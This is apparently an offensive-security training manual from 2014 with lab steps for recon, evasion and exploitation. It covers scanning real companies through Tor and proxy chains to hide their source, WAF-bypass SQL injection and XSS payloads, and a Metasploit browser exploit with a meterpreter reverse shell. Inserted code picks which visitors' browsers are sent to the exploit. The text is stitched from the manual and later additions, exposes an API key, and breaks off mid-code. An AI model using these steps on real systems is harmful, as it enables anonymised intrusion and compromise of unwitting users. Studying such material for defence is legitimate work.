
CyberWar AOCO 2014


Strategic Security, Inc.

http://strategicsec.com/

CyberWar: Advanced
Offensive Cyber
Operations
Written by Joe McCray
Contributors:



Contents

Section 1: Attacking From The Outside .................................................................................................................. 7
Lab 1: Target IP Determination ............................................................................................................................... 7
Lab 1a: Blindcrawl .....................................................................................................................................................7
Lab 1b: Fierce ............................................................................................................................................................8
Lab 1c: GXFR .............................................................................................................................................................9
Lab 1d: IP Crawl ......................................................................................................................................................10
Lab 2: Identifying Security Mechanisms ............................................................................................................... 14
Lab 2a: LBD .............................................................................................................................................................14
Lab 2b: Halberd .......................................................................................................................................................15
Lab 2c: OSSTMM .....................................................................................................................................................18
Lab 2d: SSLTEST .......................................................................................................................................................19
Lab 3: Dealing With Web Application Firewalls .................................................................................................... 21
Lab 3a: Web Application Firewall Detection ...........................................................................................................21
Lab 3b: WAF Bypass SQL Injection Payloads ...........................................................................................................22
Lab 3c: WAF Bypass Cross Site Scripting Payloads ..................................................................................................23
Lab 4: Quick Hits (Googling for vulnerabilities) .................................................................................................... 24
Lab 4a: Google for generic Database errors ...........................................................................................................24
Lab 4b: Google for generic RFIs...............................................................................................................................24
Lab 4c: Check for XSS at xssed.com:.........................................................................................................................25

Lab 5: 3rd Party Scanning and scanning via proxies .............................................................................................. 25


Lab 5a: Shodan........................................................................................................................................................26
Lab 5b: Proxyfinder.pl..............................................................................................................................................26
Lab 5c: Tor/Tor-resolve ............................................................................................................................................27
Lab 5d: Proxychains/Proxyresolv.............................................................................................................................28
Lab 5e: Port scanning through PHP proxies ............................................................................................................29
Lab 6: Nessus through Tor .................................................................................................................................... 32

Lab 7: Burp Suite .................................................................................................................................................. 34
Lab 7a: Burp Suite Through Tor/Privoxy ..................................................................................................................40
Lab 7b: Masking Nikto Headers ..............................................................................................................................44
Lab 8: Tor Through an SSH Tunnel ........................................................................................................................ 49
Section 2: Attacking The Internal Network ........................................................................................................... 59
Lab 9: Email Address Harvesting .......................................................................................................................... 62
Lab 10: Browser Fingerprinting ............................................................................................................................ 68
Lab 10a: Central Ops ...............................................................................................................................................68
Lab 10b: Metasploit ................................................................................................................................................71
Lab 11: Client-Side Enumeration .......................................................................................................................... 73
Lab 11a: Getting your shell .....................................................................................................................................73
Lab 11b: Figure out who and where you are ..........................................................................................................75
Lab 11c: Escalate privileges and get hashes ...........................................................................................................76
Lab 11d: Enumerate the host you are on ..................................................................................................................79
Lab 11e: Steal Tokens ..............................................................................................................................................83
Lab 11f: Prove access ..............................................................................................................................................86
Lab 11g: Enumerate the network you are on ..........................................................................................................87
Lab 11h: Set up your Pivot ......................................................................................................................................89
Lab 11i: Now set up Pivot with a route add ............................................................................................................90
Lab 11j: Scan through your Pivot ............................................................................................................................90
Lab 11k: Lateral movement through your Pivot ......................................................................................................91
Lab 11l: Pivot Persistence ........................................................................................................................................92
Lab 11m: Set up a Socks Proxy through your Pivot .................................................................................................97
Lab 11n: SSH Tunneling ...........................................................................................................................................99
Lab 11o: VPN Pivot ................................................................................................................................................101
Lab 11p: ICMP Tunneling ......................................................................................................................................104
Lab 11q: IPv6 to IPv4 Tunnel .................................................................................................................................106
Lab 12: VBScript For Post Exploitation ............................................................................................................... 108
Lab 12a: Identifying the IP Address .......................................................................................................................108
Lab 12b: Download a file from the internet ..........................................................................................................109
Lab 13: Running Powershell From A Command Prompt ..................................................................................... 111

Lab 13a: Reverse Shell with Powershell ................................................................................................................111
Lab 13b: Payload which could execute shellcode from DNS TXT queries. .............................................................112
Lab 13c: Run mimikatz via powershell (must be run as SYSTEM) .........................................................................113
Lab 13d: Token Manipulation to escalate (must be run as an Administrator) ......................................................114
Lab 13e: Nishang payload which scans IP addresses, ports and hostnames ..........................................................115
Lab 13f: Nishang Payload which gathers juicy information from the target. .......................................................116
Lab 13g: Nishang Payload which logs keys. ..........................................................................................................116
Lab 13h: Nishang Payload which silently browses to a URL and accepts Java Applet Run Warning ....................118
Lab 13i: Nishang Payload which dumps keys for WLAN profiles. ..........................................................................118
Lab 14: SchTasks for Powershell ......................................................................................................................... 122
Lab 15: Host Enumeration .................................................................................................................................. 129
Lab 16: Credential Harvesting & Data-Mining .................................................................................................... 139
Lab 17: Life without metasploit.......................................................................................................................... 160
Lab 18: Setting up your second entry ................................................................................................................. 167



Section 1: Attacking From The Outside


Lab 1: Target IP Determination
Lab 1a: Blindcrawl
cd ~/toolz
perl blindcrawl.pl -d motorola.com


Lab 1b: Fierce


cd ~/toolz/fierce2
fierce -dns motorola.com


Lab 1c: GXFR


cd ..
python gxfr.py --bxfr --dns-lookup -o motorola.com
Enter Domain Name: motorola.com
Bing API Key: cw1kxyUgMdkECBNMb1fGqKJ9sC1lznaR20fPJeIt45Y=


Lab 1d: IP Crawl


Reverse DNS (PTR) lookup against a given IP range. The nmap -sL list scan further down does the same job without sending a single packet to the targets, which makes it a quiet first pass over a range.
cd ~/toolz/
./ipcrawl 148.87.1.1 148.87.1.254


sudo nmap -sL 148.87.1.0-255

sudo nmap -sL 148.87.1.0-255 | grep oracle


dig google.com
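An added example (not part of the original manual): the filtering that the `nmap -sL ... | grep oracle` pipeline above does, done on parsed records so the IP/hostname pairs stay usable for the next step. The list-scan output embedded below is constructed; the 148.87.1.x addresses and example-corp.com names are made up for illustration.

```python
# Added example: parse `nmap -sL` output and filter it by PTR name.
# `nmap -sL` sends nothing to the targets; it only does reverse DNS lookups,
# so this is the quiet way to map a range to an organisation's hostnames.
import re
from collections import defaultdict

# Constructed list-scan output; range and hostnames are illustrative only.
SAMPLE_NMAP_SL = """\
Starting Nmap 6.40 ( http://nmap.org ) at 2014-03-01 10:00 EST
Nmap scan report for 148.87.1.1
Nmap scan report for web01.example-corp.com (148.87.1.10)
Nmap scan report for oracle-dev.example-corp.com (148.87.1.11)
Nmap scan report for mail.example-corp.com (148.87.1.20)
Nmap scan report for ORACLE-DB2.example-corp.com (148.87.1.21)
Nmap done: 5 IP addresses (0 hosts up) scanned in 0.11 seconds
"""

# Two shapes: "host (ip)" when the PTR resolved, bare "ip" when it did not.
LINE_RE = re.compile(
    r"^Nmap scan report for (?:(?P<host>\S+) \((?P<ip1>[\d.]+)\)|(?P<ip2>[\d.]+))\s*$"
)


def parse_list_scan(text):
    """Return [(ip, hostname_or_None), ...] in the order nmap printed them."""
    records = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        if m.group("host"):
            records.append((m.group("ip1"), m.group("host").lower()))
        else:
            records.append((m.group("ip2"), None))
    return records


def hosts_matching(records, keyword):
    """Case-insensitive keyword match on the PTR name; unresolved IPs are skipped."""
    kw = keyword.lower()
    return [(ip, host) for ip, host in records if host and kw in host]


def group_by_domain(records):
    """Group resolved IPs by parent domain to see who actually owns the range."""
    groups = defaultdict(list)
    for ip, host in records:
        if host and "." in host:
            groups[host.split(".", 1)[1]].append(ip)
    return dict(groups)


if __name__ == "__main__":
    recs = parse_list_scan(SAMPLE_NMAP_SL)
    for ip, host in hosts_matching(recs, "oracle"):
        print(ip, host)
```

Lower-casing the PTR names before matching matters: DNS is case-insensitive, but `grep oracle` on raw output would miss the ORACLE-DB2 record above.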


Lab 2: Identifying Security Mechanisms


Lab 2a: LBD
cd ~/toolz
./lbd-0.1.sh google.com


Lab 2b: Halberd


halberd microsoft.com

halberd motorola.com


halberd oracle.com
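An added example (not part of the original manual) of the check lbd and halberd perform in Labs 2a and 2b, written out by hand: compare the headers of repeated responses from one hostname and look for three kinds of evidence of a load balancer, namely header values that differ between responses, a persistence ("sticky") cookie, and back-end clocks that disagree with each other. The responses below are constructed so the logic runs offline; fetching real ones with urllib is left out.

```python
# Added example: load-balancer detection from a set of HTTP response headers,
# the same evidence lbd/halberd look for. Responses are constructed.
from collections import Counter
from email.utils import parsedate_to_datetime

# Headers that should be constant if one server answers every request.
FINGERPRINT_FIELDS = ("Server", "X-Powered-By", "ETag", "Via", "X-Served-By")
# Cookie-name prefixes set by common load balancers for session stickiness
# (F5 BIG-IP, IIS ARR, AWS ALB, HAProxy and Apache balancer documentation examples).
STICKY_COOKIE_PREFIXES = ("BIGipServer", "ARRAffinity", "AWSALB", "SERVERID", "ROUTEID")

# Each dict is one response; "_sent_at" is the local epoch time the request left.
SAMPLE_RESPONSES = [
    {"_sent_at": 1393670000.0, "Server": "Apache/2.2.22 (Ubuntu)",
     "Date": "Sat, 01 Mar 2014 10:33:20 GMT",
     "Set-Cookie": "BIGipServerpool_web=1677787402.20480.0000; path=/"},
    {"_sent_at": 1393670001.0, "Server": "Apache/2.2.15 (CentOS)",
     "Date": "Sat, 01 Mar 2014 10:33:18 GMT",
     "Set-Cookie": "BIGipServerpool_web=1694564618.20480.0000; path=/"},
    {"_sent_at": 1393670002.0, "Server": "Apache/2.2.22 (Ubuntu)",
     "Date": "Sat, 01 Mar 2014 10:33:22 GMT"},
    {"_sent_at": 1393670003.0, "Server": "Apache/2.2.15 (CentOS)",
     "Date": "Sat, 01 Mar 2014 10:33:20 GMT"},
]
SINGLE_SERVER = [
    {"_sent_at": 1393670000.0, "Server": "nginx/1.4.6", "Date": "Sat, 01 Mar 2014 10:33:20 GMT"},
    {"_sent_at": 1393670001.0, "Server": "nginx/1.4.6", "Date": "Sat, 01 Mar 2014 10:33:21 GMT"},
]


def detect_load_balancer(responses):
    """Collect evidence into a dict; is_load_balanced() turns it into a verdict."""
    evidence = {"differing_headers": {}, "persistence_cookies": [], "clock_skew_s": 0.0}
    for field in FINGERPRINT_FIELDS:
        values = Counter(h[field] for h in responses if field in h)
        if len(values) > 1:
            evidence["differing_headers"][field] = dict(values)
    for h in responses:
        name = h.get("Set-Cookie", "").split("=", 1)[0]
        if name.startswith(STICKY_COOKIE_PREFIXES) and name not in evidence["persistence_cookies"]:
            evidence["persistence_cookies"].append(name)
    # Offset between the server's Date header and our send time. One server
    # gives a stable offset; several back ends with drifting clocks do not.
    skews = [parsedate_to_datetime(h["Date"]).timestamp() - h["_sent_at"]
             for h in responses if "Date" in h and "_sent_at" in h]
    if len(skews) > 1:
        evidence["clock_skew_s"] = max(skews) - min(skews)
    return evidence


def is_load_balanced(evidence, max_clock_skew=2.0):
    return (bool(evidence["differing_headers"])
            or bool(evidence["persistence_cookies"])
            or evidence["clock_skew_s"] > max_clock_skew)


if __name__ == "__main__":
    ev = detect_load_balancer(SAMPLE_RESPONSES)
    print(ev, "->", "load balanced" if is_load_balanced(ev) else "single server")
```

The clock-skew test is the one that still works when every back end is built from the same image and sets no cookie: identical software gives identical headers, but NTP rarely keeps a pool of servers within the same second of each other.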


Lab 2c: OSSTMM


osstmm-afd -P HTTP -t strategicsec.com -v


Lab 2d: SSLTEST


cd toolz/
cat /etc/xinetd.d/ssltest

cat /home/strategicsec/toolz/ssl_proxy.sh

service xinetd status


osstmm-afd -P HTTP -t 127.0.0.1 -p 8888 -v


Lab 3: Dealing With Web Application Firewalls


Lab 3a: Web Application Firewall Detection
WAF Detection
cd ~/toolz/wafw00f
python wafw00f.py http://www.oracle.com

cd ~/toolz/
sudo nmap -p 80 --script http-waf-detect.nse oracle.com


Lab 3b: WAF Bypass SQL Injection Payloads


Go to the address below in firefox:
http://www.modsecurity.org/demo/crs-demo.html
Insert the following payloads and keep track of the scores each payload receives
SQL Injection Payloads
' or 1=1

' or 1=1--

%27%20or%201=1%2D%2D

' and 8<9

%27%20and%208<9%2D%2D


Lab 3c: WAF Bypass Cross Site Scripting Payloads


<script>alert('xss')</script>

%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E

prompt('xss')

prompt%28%27xss%27%29
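An added example, not part of the original manual, that does for Labs 3b and 3c what the CRS demo asks you to do by hand: generate the encoded variants of each payload (single and double URL-encoding, alternating case, inline SQL comments), show what the back end sees after each URL-decode pass, and test every variant against a deliberately weak "toy" WAF that decodes once and matches case-sensitively. The toy rules are an illustration of the bypass mechanics only; the real CRS normalises far more aggressively and will score most of these.

```python
# Added example: WAF-bypass payload variants and what the back end decodes them to.
import re
from urllib.parse import quote, unquote

SQLI_PAYLOADS = ["' or 1=1--", "' and 8<9--"]
XSS_PAYLOADS = ["<script>alert('xss')</script>", "prompt('xss')"]


def url_encode(p):
    return quote(p, safe="")


def double_encode(p):
    """A WAF that decodes once sees %27; an app that decodes again sees the quote."""
    return quote(quote(p, safe=""), safe="")


def mixed_case(p):
    """Alternate letter case; beats signatures that do not lowercase the input."""
    return "".join(c.upper() if i % 2 else c.lower() for i, c in enumerate(p))


def inline_comments(p):
    """Replace spaces with /**/, which SQL parsers treat as whitespace."""
    return p.replace(" ", "/**/")


def variants(p):
    return {
        "raw": p,
        "url": url_encode(p),
        "double_url": double_encode(p),
        "mixed_case": mixed_case(p),
        "comments": inline_comments(p),
    }


def backend_view(variant, decode_passes=1):
    """What the application sees after the given number of URL-decode passes."""
    for _ in range(decode_passes):
        variant = unquote(variant)
    return variant


# Toy WAF: one decode pass, case-sensitive regexes. Real WAFs normalise far more.
TOY_WAF_RULES = [re.compile(r"'\s*or\s+\d+=\d+"), re.compile(r"<script>")]


def toy_waf_blocks(variant):
    seen = unquote(variant)
    return any(rule.search(seen) for rule in TOY_WAF_RULES)


def evading_variants(p):
    """Names of the variants the toy WAF lets through."""
    return [name for name, v in variants(p).items() if not toy_waf_blocks(v)]


if __name__ == "__main__":
    for p in SQLI_PAYLOADS + XSS_PAYLOADS:
        for name, v in variants(p).items():
            print("%-10s %-44s backend sees %-34r blocked=%s"
                  % (name, v, backend_view(v), toy_waf_blocks(v)))
```

The double-encoding case is the one to remember: it only works when the WAF and the application disagree about how many times to decode, so when you score it on the demo, also check how the target application itself treats `%25`.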


Lab 4: Quick Hits (Googling for vulnerabilities)


Using Google for finding vulnerabilities

Lab 4a: Google for generic Database errors


site:example.com "Microsoft OLE DB Provider for SQL Server"
site:example.com "Microsoft JET Database Engine"
site:example.com "Type mismatch"
site:example.com "You have an error in your SQL syntax"
site:example.com "Invalid SQL statement or JDBC"
site:example.com "DorisDuke error"
site:example.com "OleDbException"
site:example.com "JasperException"
site:example.com "Fatal Error"
site:example.com "supplied argument is not a valid MySQL"
site:example.com "mysql_"
site:example.com ODBC
site:example.com JDBC
site:example.com ORA-00921
site:example.com ADODB

Lab 4b: Google for generic RFIs


site:example.com ".php" "file="
site:example.com ".php" "folder="
site:example.com ".php" "path="
site:example.com ".php" "style="
site:example.com ".php" "template="
site:example.com ".php" "PHP_PATH="
site:example.com ".php" "doc="
site:example.com ".php" "document="
site:example.com ".php" "document_root="
site:example.com ".php" "pg="
site:example.com ".php" "pdf="
site:example.com ".php" "page="
site:example.com ".php" "inc="
site:example.com ".php" "dir="
site:example.com ".php" "frame="
site:example.com ".php" "swf="
site:example.com ".php" "host="


Lab 4c: Check for XSS at xssed.com:


http://xssed.com/search?key=example.com


Lab 5: 3rd Party Scanning and scanning via proxies


Lab 5a: Shodan
http://www.shodanhq.com/
Create an account and log in; you must have an account to use search filters such as the one below.
net:129.188.8.0/24

Lab 5b: Proxyfinder.pl


Proxyfinder.pl is a Perl script that scrapes multiproxy or samair for as many proxies as you
specify. You can then use these proxies with Proxychains.
perl proxyfinder-0.3.pl multiproxy 10 results.txt


This step takes some time, upwards of an hour, because it checks every proxy to make sure it is
alive. Once it's done, copy the contents of your results.txt file into /etc/proxychains.conf, in the
[ProxyList] section at the bottom of the file.

Lab 5c: Tor/Tor-resolve


We can also use tor-resolve to resolve hostnames through Tor rather than through the local resolver.
tor &
(this starts Tor; it should already be running on your VM)

Open up another tab to resolve the hostname


tor-resolve strategicsec.com


Lab 5d: Proxychains/Proxyresolv


Proxychains is in the repositories of most current Linux distros.
Let's see what we can do. Start Tor, then run the following command:
proxyresolv <hostname>

Proxyresolv resolves host names through the proxy chain (here, Tor) instead of your local DNS, so the lookup does not hand the target's name to your own resolver.

Now let's port scan a machine through proxychains. Note the switches: -sT because a SOCKS proxy can only carry complete TCP connections, while raw-packet scans (-sS, UDP, ICMP) bypass the proxychains hook and leave from your real IP; -Pn because host-discovery probes would likewise go out directly; and -n because name resolution would otherwise be done locally.
proxychains nmap -sT -Pn -n -sV -p 21,22,23,25,80,110,139,443,445,1433,1521,3306,3389,8080,10000
[ip address/ip range]


We can even run Nikto through proxychains


cd toolz/nikto-2.1.1/
proxychains perl nikto.pl -Cgidirs all -o google_nikto.txt -host www.google.com

Lab 5e: Port scanning through PHP proxies


In previous labs we've seen the use of SOCKS proxies. In this lab we look at a trend that
seems to be growing in popularity, PHP web proxies. SensePost has a tool called glypeahead that lets us
port scan through these proxies.

Download the tool from: http://www.sensepost.com/research/glypeahead/


Once you've downloaded and unzipped the file you will be greeted with a directory containing 3 files and
a directory. What we are really interested in is config.php and the application itself.
The config.php file is where you specify which site you would like to scan.

In this section you can also specify which ports you want glypeahead to scan. At the bottom of the
configuration file, you can also specify which proxies glypeahead should use.

You can get a list of glype proxies from the following link: http://www.azproxies.com/proxy-lists/glype-webproxies.html
Make sure that each proxy entry ends with index.php, otherwise glypeahead will error out.


Of course, you can always add more proxies; you do not have to limit yourself to two. The same
goes for the sites, and you can change the ports to whatever you want to scan for. I left them the
same for simplicity. This is what you'll get when everything works out fine.
GlypeAhead needs to be fed the config.php file.


Lab 6: Nessus through Tor


Register & Download Nessus
Register for a free account to download a copy of the Nessus HomeFeed vulnerability scanner at
http://www.nessus.org/products/nessus/nessus-download-agreement
Installing Nessus
This installation is performed on the Ubuntu x86 machine. Follow the vendor's instructions to install Nessus on
other platforms.

Initial Account Setup


Open a browser on your machine and go to https://localhost:8834
You will be asked to create an administrative account to manage Nessus. In this example, we will create
an account admin with the password password1. Click Next and proceed with the rest of the setup
process.

After Nessus is installed, run the following command to relay every connection made to local port 8080 to the
target's port 80 through Tor's SOCKS server:
socat TCP4-LISTEN:8080,fork SOCKS4:127.0.0.1:<target ip address>:80,socksport=9050

Now run a Nessus scan against localhost, port 8080.

Keep in mind what this relay does and does not cover. Only traffic Nessus sends to 127.0.0.1:8080 goes through Tor, and all of it lands on the target's port 80, so limit the scan to that port (web application checks), turn off host-discovery pings and remote OS fingerprinting, and remember that anything Nessus finds on other ports of 127.0.0.1 is your own machine, not the target. Plain SOCKS4 also takes an IP address, not a name, so the target is resolved locally before socat starts.

Finally, once it's completed, look over the report.


Lab 7: Burp Suite


Download latest free version of Burp at http://www.portswigger.net/burp/download.html
java -jar burpsuite_free_v1.5.jar
- Click the "Proxy" tab
- Click the "Options" sub tab
- Select proxy listener and click on Edit. Go to Certificate tab.
Ensure that burp is configured to "generate CA-signed per-host certificates"

Open Firefox
- Click "Edit"
- Click Preferences"
- Click the "Advanced" tab
- Click the "Network" sub tab
- Click the connection "settings" button
- Click "manual proxy configuration"
set it to 127.0.0.1 port 8080
check "Use this proxy server for all protocols"
- Remove both the "localhost, 127.0.0.1" text from the "No Proxy For:" line


Configure your browser to use Burp as its proxy, and configure Burp's proxy listener to generate CA-signed per-host certificates.
Visit any SSL-protected URL.
On the This Connection is Untrusted screen, click on Add Exception
Click "Get Certificate", then click "View".

In the Details tab, select the root certificate in the tree (PortSwigger CA).

Click "Export" and save the certificate as "BurpCert" on the Desktop.


Close Certificate Viewer dialog and click Cancel on the Add Security Exception dialog
Go to Edit | Preferences
Click Advanced and go to Encryption tab
Click View Certificates
Click "Import" and select the certificate file that you previously saved.

On the "Downloading Certificate" dialog, check the box "Trust this CA to identify web sites", and click
"OK".

Close all dialogs and restart Firefox.

Lab 7a: Burp Suite Through Tor/Privoxy


Since we've already installed and configured Tor, Privoxy should be working fine, but a few things need to be
set before the two work together.
Open Privoxy's config file (typically /etc/privoxy/config) in your favorite text editor and search for 9050.


Once you've found the line that reads forward-socks5 / 127.0.0.1:9050 . (the trailing dot is part of the directive and means there is no further parent proxy), uncomment it.
Now we need to configure the proxy settings.

If you are using Burp v1.5 the proxy settings are under the Options tab.

We need to set this up to go through Privoxy, which listens on port 8118 by default. Scroll
down until you see the section labeled Upstream Proxy Servers, fill in the proxy host with the localhost
address 127.0.0.1 and use 8118 for the proxy port. Click the Add button when finished.


Once youre finished with this, the final step is to fire up Tor and Privoxy.

Lab 7b: Masking Nikto Headers


In this lab we are going to mask the Nikto User-Agent in the request header. Navigate to the
directory where you've stored Nikto. In this directory you'll notice a nikto.conf file.

Open the config file in your favorite text editor and look for the lines referencing proxy options.

Uncomment the two lines for PROXYHOST and PROXYPORT; you will also have to change the
PROXYPORT so that Nikto goes through Burp (8080 in Lab 7).

If we run Nikto now we can see what the default User-Agent looks like.


To modify Nikto's User-Agent we need a list of realistic browser User-Agent strings; the mechanize Ruby gem ships one. If you are on Fedora
you can simply use yum to install it. If not, you can download it at http://mechanize.rubyforge.org or use
the command:
sudo gem install mechanize
If you've installed it via gem install, navigate to /usr/lib/gems/1.8/gems/mechanize-2.5.1/lib/

In the mechanize.rb file you can see the different user agents. From this list make a
separate user-agent.txt file. You may want to clean it up a little bit.

Now we can change the User-Agent. Go into Burp and navigate to Proxy -> Options and scroll
down to Match and Replace.


Just copy and paste in the user-agent information from your user-agent.txt file. I am going to use the Mac
Firefox user-agent.

Make sure that the request header box is checked. Now run Nikto again.


Once you navigate to a web page, you should see the activity under the Proxy tab and then under the
Intercept tab:


Lab 8: Tor Through an SSH Tunnel


Before we get started we need to make sure that TOR is using the default port and listen-address.
Navigate to /etc/tor and open up the torrc file. You should see.

SocksPort 9050
SocksListenAddress 127.0.0.1
If your torrc file looks like this then we can go on. This next step depends on whether you are using
OpenSSH or PuTTY. If you're using OpenSSH, this step is pretty easy.
Let's say you have two machines, Host1 and Host2. Host2 is the PC you want to route
traffic from and Host1 is the PC running Tor. From Host2, run:
ssh -L 9050:127.0.0.1:9050 user@Host1

Once you've logged in, the tunnel is active: anything on Host2 that connects to 127.0.0.1:9050 is carried
over the encrypted SSH session and delivered to 127.0.0.1:9050 on Host1, which is Tor's SOCKS port. If we
configure Firefox on Host2 to use 127.0.0.1:9050 as a SOCKS proxy, its traffic goes through the SSH tunnel
to Host1 and out over Tor. Because Tor only listens on 127.0.0.1, the tunnel is also what makes the SOCKS
port reachable from Host2 at all.


The procedure on your Windows machine is pretty much the same, just more GUI based. First, open up
PuTTY.


We need to configure our connection. Navigate to Connection -> SSH -> Tunnels


For the Source Port enter 9050 and for the Destination put 127.0.0.1:9050 and finally click Add.

Now go to Session and enter the IP address of Host1 under Host Name (or IP Address). Click Open.


Login using the username and password of Host1.

Now that youve set up PuTTY, install foxyproxy for Firefox and add a new proxy.


Under Select Mode, choose Use Proxy 127.0.0.1 for all URLs.

There is one more problem. By default Firefox resolves hostnames with your local DNS even when it uses a
SOCKS proxy, so the names you visit leak to your own resolver. To send DNS queries through the SOCKS proxy
as well, open a new tab, go to about:config, type network.proxy.socks_remote_dns in the filter field and,
if it is not already true, set it to true. Now check that you are surfing anonymously.


If everything goes right, your traffic will be forwarded over the SSH tunnel to Host1 and out through Tor.
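An added example, not part of the original manual, that covers Labs 5d, 6 and 8 at once: the SOCKS4 and SOCKS4a CONNECT requests that proxychains, socat and Firefox hand to Tor on 127.0.0.1:9050, built and parsed by hand from the protocol's byte layout. It shows why the socks_remote_dns setting matters: a plain SOCKS4 request carries a destination IP, so the client must already have resolved the name over its normal DNS, while a SOCKS4a request carries the hostname and lets Tor resolve it at the exit. Only the byte handling is shown; the socket I/O is omitted so the code runs offline. The 192.0.2.10 address and example.com are placeholders.

```python
# Added example: SOCKS4 / SOCKS4a CONNECT request construction and reply parsing.
# With a `socks4 127.0.0.1 9050` entry in proxychains.conf every TCP connect()
# becomes a request like socks4_connect() below, which is why nmap needs -n and -sT.
import struct
import ipaddress

REPLY_CODES = {0x5A: "granted", 0x5B: "rejected or failed",
               0x5C: "identd unreachable", 0x5D: "identd user mismatch"}


def socks4_connect(ip, port, userid=b""):
    """SOCKS4 request: VN=4, CD=1 (CONNECT), DSTPORT, DSTIP, USERID, NUL."""
    return (b"\x04\x01" + struct.pack(">H", port)
            + ipaddress.IPv4Address(ip).packed + userid + b"\x00")


def socks4a_connect(hostname, port, userid=b""):
    """SOCKS4a: DSTIP is 0.0.0.x (x != 0) and the hostname follows, NUL-terminated,
    so the proxy (Tor) does the resolution instead of the client."""
    return (b"\x04\x01" + struct.pack(">H", port) + b"\x00\x00\x00\x01"
            + userid + b"\x00" + hostname.encode("idna") + b"\x00")


def leaks_dns(request):
    """True when the request carries a real destination IP, i.e. the client
    already resolved the hostname outside the proxy."""
    dstip = request[4:8]
    return not (dstip[:3] == b"\x00\x00\x00" and dstip[3] != 0)


def parse_reply(data):
    """Reply is 8 bytes: VN=0, CD, DSTPORT, DSTIP. Returns (text, success)."""
    if len(data) < 8 or data[0] != 0:
        raise ValueError("not a SOCKS4 reply")
    cd = data[1]
    return REPLY_CODES.get(cd, "unknown 0x%02x" % cd), cd == 0x5A


if __name__ == "__main__":
    print("SOCKS4  :", socks4_connect("192.0.2.10", 80).hex())
    print("SOCKS4a :", socks4a_connect("example.com", 443).hex())
    print(parse_reply(b"\x00\x5a\x00\x00\x00\x00\x00\x00"))
```

The same layout explains the scanning limits in Lab 5d: there is no way to express a SYN-only probe, a UDP datagram or an ICMP echo in this protocol, so only tools that open full TCP connections can be pushed through the proxy.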


Section 2: Attacking The Internal Network


You can download the attack virtual machine from here:
https://s3.amazonaws.com/StrategicSec-VMs/Strategicsec-Ubuntu-VPN-163.zip
user:
strategicsec
pass:
strategicsec
STRATEGICSEC-Ubuntu VPN Setup
You will need the VPN username and password provided by Joseph McCray in order to complete this
installation.
Log in to the Strategic-Ubuntu VM with user/pass: strategicsec/strategicsec

You'll be presented with an empty desktop. Open a Terminal window by holding down [Ctrl+Alt] and then
pressing T, or find it through the left sidebar by clicking on Dash home


then typing terminal in the search bar

and selecting Terminal.


At the newly open Terminal window, type the command: vpn

Enter the password for the strategicsec user here.


The VPN service will start and will ask you for your username, then your password. This is the Username
and Password that has been provided to you by Joe McCray.


At this point you'll see a bunch of text while the VPN service connects.
When this completes, you can open another Terminal window or tab and type the command: ifconfig
This will show you all of your network interfaces and you can verify that a tap0 interface has been created
and you have been assigned an ip address in the lab.

Congratulations you are ready to begin working in the Strategic Security Lab!
When you are ready to disable your VPN connection to the Lab network, take the tap0 VPN interface
down: sudo ifconfig tap0 down


Afterward you can verify the connection is down by typing ifconfig to show the network interfaces that are
up and by attempting to ping a previously known Lab ip address.

Lab 9: Email Address Harvesting


cd ~/toolz/
svn checkout http://theharvester.googlecode.com/svn/trunk/
cd theharvester-read-only/
python theHarvester.py


python theHarvester.py -d motorola.com -l 50 -b google


python theHarvester.py -d motorola.com -l 50 -b bing

python theHarvester.py -d motorola.com -l 50 -b linkedin

python theHarvester.py -d motorola.com -l 50 -b pgp


Lab 10: Browser Fingerprinting


Lab 10a: Central Ops
From your host machine - browse to 'http://centralops.net/' - click on Browser Mirror

cd /var/www
sudo wget https://s3.amazonaws.com/StrategicSec-Files/browser-fingerprint.zip
sudo unzip browser-fingerprint.zip

sudo touch browser.log
sudo chmod 777 browser.log
cat config.php


tail -f /var/www/browser.log
****See the browser version that connects to your server****
ctrl-c


sudo vi config.php

****change this line****


define('DEFAULT_REDIRECT', 'http://google.com');
****to this****
define('DEFAULT_REDIRECT', 'http://StrategicSec-Ubuntu-Tap0-IP:8080/attack');


Lab 10b: Metasploit


cd ~/toolz/metasploit
sudo ./msfconsole
use exploit/windows/browser/ie_cgenericelement_uaf
set ExitOnSession false
set URIPATH /attack
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST StrategicSec-Ubuntu-Tap0-IP
exploit -j
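An added example, not part of the original manual, that writes out the decision the redirect page from Lab 10a makes: parse the User-Agent strings that land in browser.log, work out browser, major version and Windows release, and choose between the Metasploit URL from Lab 10b and the harmless DEFAULT_REDIRECT for everyone else. Assumptions: browser.log lines are of the form client_ip<TAB>user_agent, and the TARGETS table is illustrative (check `info` on ie_cgenericelement_uaf in msfconsole for the browser and OS versions the module actually supports). The log lines are constructed.

```python
# Added example: User-Agent fingerprinting to decide who gets the exploit URL.
import re

EXPLOIT_URL = "http://StrategicSec-Ubuntu-Tap0-IP:8080/attack"
DEFAULT_REDIRECT = "http://google.com"

# Assumed target table: (browser, major version, OS) combinations sent to the exploit.
TARGETS = {("IE", 8, "Windows 7"), ("IE", 9, "Windows 7")}

# Constructed browser.log lines: "client_ip<TAB>user_agent".
SAMPLE_LOG = "\n".join([
    "10.0.0.5\tMozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)",
    "10.0.0.6\tMozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)",
    "10.0.0.7\tMozilla/5.0 (Windows NT 6.1; rv:27.0) Gecko/20100101 Firefox/27.0",
    "10.0.0.8\tMozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko",
    "10.0.0.9\tMozilla/5.0 (Macintosh; Intel Mac OS X 10_9_1) AppleWebKit/537.36 "
    "(KHTML, like Gecko) Chrome/32.0.1700.107 Safari/537.36",
])

TRIDENT_RE = re.compile(r"Trident/(\d+)\.")   # engine token: Trident/N is IE N+4
MSIE_RE = re.compile(r"MSIE (\d+)\.")          # absent in IE 11, lies in compat view
FIREFOX_RE = re.compile(r"Firefox/(\d+)")
CHROME_RE = re.compile(r"Chrome/(\d+)")
WINNT_RE = re.compile(r"Windows NT (\d+\.\d+)")
WINDOWS_RELEASES = {"5.1": "XP", "6.0": "Vista", "6.1": "7", "6.2": "8", "6.3": "8.1", "10.0": "10"}


def fingerprint(ua):
    """Return (browser, major_version, os) from a User-Agent string."""
    browser, major = "unknown", None
    m = TRIDENT_RE.search(ua)
    if m:                        # trust the engine token over MSIE (compat view lies)
        browser, major = "IE", int(m.group(1)) + 4
    elif MSIE_RE.search(ua):     # IE 7 and older carry no Trident token
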